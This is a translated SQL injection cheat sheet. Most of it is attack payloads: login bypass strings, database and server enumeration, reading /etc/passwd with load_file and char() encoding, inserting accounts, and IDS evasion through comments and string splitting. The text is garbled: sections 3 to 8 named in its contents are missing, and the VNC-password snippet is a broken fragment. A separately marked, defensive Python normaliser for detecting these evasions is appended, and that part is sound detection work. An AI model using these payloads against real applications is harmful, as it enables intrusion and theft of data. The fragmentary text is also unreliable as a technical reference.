天马行空●狼技术小组 (Wolf Technical Team) [1.S.T]
--------------
Translation: 浪迹天.Iceskysl@1.S.T
1. Introduction
2. Testing for vulnerabilities
3. Gathering information
4. Data types
5. Grabbing passwords
6. Create DB accounts
7. MySQL OS interaction
8. Server name and config
9. Retrieving VNC password from registry
10. IDS signature evasion
11. MySQL input validation circumvention using Char()
12. IDS signature evasion using comments
13. Strings without quotes

1. Introduction

When a box only has port 80 open, it's almost certain the admin will patch his server, so the best thing to turn to is web attacks. SQL injection is one of the most common web attacks. You attack the web application (ASP, JSP, PHP, CGI, etc.) rather than the web server or the services running on the OS. SQL injection is a way to trick the application by supplying a query or command as input via web pages; most websites take parameters from the user, like username and password or even their emails, and they all use SQL queries.

2. Testing for vulnerabilities

First of all you should start with something simple.

Pass: ' or 1=1--
' having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
' or 1 in (select @@version)--
' and 1 in (select servername from master..sysservers)--
9. Retrieving VNC password from registry

-';declare @out binary(8)
@rootkey = 'HKEY_LOCAL_MACHINE',
@value_name='password',
select cast(@out as bigint) as x into TEMP--

10. IDS signature evasion

' OR 'something' = 'some'+'thing'
' OR 'something' like 'some%'
' OR 'text' > 't'
' OR 2 BETWEEN 1 and 3
11. MySQL input validation circumvention using Char()

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string = "root"):
--> ' union select * from users where login = char(114,111,111,116);
Load files in unions (string = "/etc/passwd"):
--> ' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
--> ' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12. IDS signature evasion using comments

--> '/**/OR/**/1/**/=/**/1
--> Username: ' or 1/*
--> Password: */=1--
--> UNI/**/ON SEL/**/ECT
--> (Oracle)
';EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
--> (MS SQL)
';EXEC('SEL' + 'ECT US' + 'ER')
13. Strings without quotes

--> INSERT INTO Users(Login, Password, Level) VALUES(char(0x70)+char(0x65)+char(0x74)+char(0x65)+char(0x72), char(0x70)+char(0x65)+char(0x74)+char(0x65)+char(0x72), 0x64)
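Added detection-side example, not part of the original document: a small normaliser that undoes the inline-comment, char() and quoteless-string forms from sections 11 to 13 before signature matching, so one signature written against the canonical query covers all of them. The signature set and sample inputs are constructed for illustration.

```python
import re

# Constructed signature set: each pattern is written against the canonical form
# (comments removed, char() sequences decoded, adjacent string literals merged).
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\s*select\b", re.IGNORECASE),
    "or_1_eq_1":     re.compile(r"\bor\s*1\s*=\s*1\b", re.IGNORECASE),
    "like_wildcard": re.compile(r"\blike\s*'%", re.IGNORECASE),
    "load_file":     re.compile(r"\bload_file\s*\(\s*'", re.IGNORECASE),
}


def _char_to_literal(m):
    """char(114,111,111,116) -> 'root'; char(0x70) -> 'p'. Left unchanged if not numeric."""
    try:
        chars = []
        for tok in m.group(1).split(","):
            tok = tok.strip()
            chars.append(chr(int(tok, 16) if tok.lower().startswith("0x") else int(tok)))
    except ValueError:
        return m.group(0)
    return "'" + "".join(chars) + "'"


def normalize(s):
    """Undo the evasion forms from sections 11-13 so one signature covers them all."""
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.DOTALL)                # UNI/**/ON -> UNION
    s = re.sub(r"\bchar\(([^)]*)\)", _char_to_literal, s, flags=re.IGNORECASE)
    s = re.sub(r"'\s*(?:\+|\|\|)\s*'", "", s)                       # 'SEL' || 'ECT' -> 'SELECT'
    return re.sub(r"\s+", " ", s).strip()


def hits(s):
    """Names of the signatures that fire on the string as given."""
    return {name for name, rx in SIGNATURES.items() if rx.search(s)}


def scan(s):
    """Return (hits on the raw input, hits after normalization)."""
    return hits(s), hits(normalize(s))
```

Run scan() over the raw request parameter: an empty raw set with a non-empty normalized set is exactly the evasion case, and a normalizer that throws on odd input (handled here by leaving the token untouched) would be its own bypass.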
Greets: kaneda, modem, wildcard, #black and pulltheplug.